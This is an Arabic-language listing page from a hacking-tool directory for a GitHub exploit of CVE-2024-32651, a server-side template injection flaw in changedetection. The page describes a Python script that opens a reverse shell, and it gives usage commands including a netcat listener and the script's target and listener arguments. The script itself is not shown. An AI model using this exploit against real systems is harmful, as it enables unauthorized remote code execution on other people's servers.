Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-32651-changedetection-RCE — استغلال حقن القالب من جانب الخادم | Kitploit
أدوات/GitHubGitHub/s0ck3t-s3c/cve-2024-32651-changedetection-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubs0ck3t-s3c/cve-2024-32651-changedetection-rce

CVE-2024-32651-changedetection-RCE

استغلال حقن القالب من جانب الخادم

عرض المستودع
433منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-32651 changedetection < 0.45.20 - تنفيذ التعليمات البرمجية عن بُعد (RCE)

استغلال حقن القالب من جانب الخادم!!

1. العنوان

تنفيذ التعليمات البرمجية عن بُعد عبر حقن القالب من جانب الخادم (SSTI) في تطبيق ويب معرّض للثغرة

2. الوصف

يستهدف هذا الاستغلال تطبيق ويب معرّضًا لثغرة حقن القالب من جانب الخادم (SSTI). من خلال استغلال هذه الثغرة، يمكن للمهاجم تنفيذ أوامر عشوائية على الخادم. يعمل البرنامج النصي ببايثون المقدم على أتمتة عملية الاستغلال عن طريق إرسال حمولة تؤدي إلى تشغيل قشرة عكسية.

3. معلومات الثغرة

  1. معرف CVE: CVE-2024-32651
  2. الأنظمة المتأثرة: تطبيقات الويب التي تستخدم حقن القالب من جانب الخادم (SSTI) ولديها إعدادات قابلة للاستغلال.

4. إثبات المفهوم

لإعادة إنتاج الثغرة، قم بتنفيذ البرنامج النصي ببايثون المقدم ضد تطبيق الويب المعرّض للثغرة. تأكد من أن لديك مستمعًا (مثل nc -lvp 9999) يعمل لالتقاط اتصال القشرة العكسية.

5. الاستخدام

  1. احفظ البرنامج النصي في ملف باسم CVE-2024-32651.py.

  2. ثبّت مكتبات بايثون المطلوبة إذا لم تكن مثبتة بالفعل:

    root@kitploit:~
    pip install requests beautifulsoup4
    
  3. لاستخدام البرنامج النصي، قم بتوفير وسائط سطر الأوامر التالية:

  • --url: عنوان URL الأساسي لتطبيق الويب المعرّض للثغرة (مثل http://10.10.10.10:5000).
  • --port: منفذ المستمع (مثل 9999).
  • --ip: عنوان IP الخاص بالمستمع (مثل 10.10.50.22).
  • --notification: (اختياري) عنوان URL للإشعار إذا كنت تريد استخدام عنوان إشعار محدد.
  1. شغّل البرنامج النصي باستخدام بايثون 3 مع الوسائط المطلوبة. الصيغة هي:
    root@kitploit:~
    python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
    

6. الاعتمادات

يعتمد هذا الإصدار المُصلح من الاستغلال على استغلال أصلي نُشر بواسطة Zach Crosman (zcrosman) بمعرف EDB-ID: 52027. يمكنك الاطلاع على الاستغلال الأصلي هنا. أشكر Zach Crosman على مساهمته في مجتمع الأمان.

تنزيل الأداة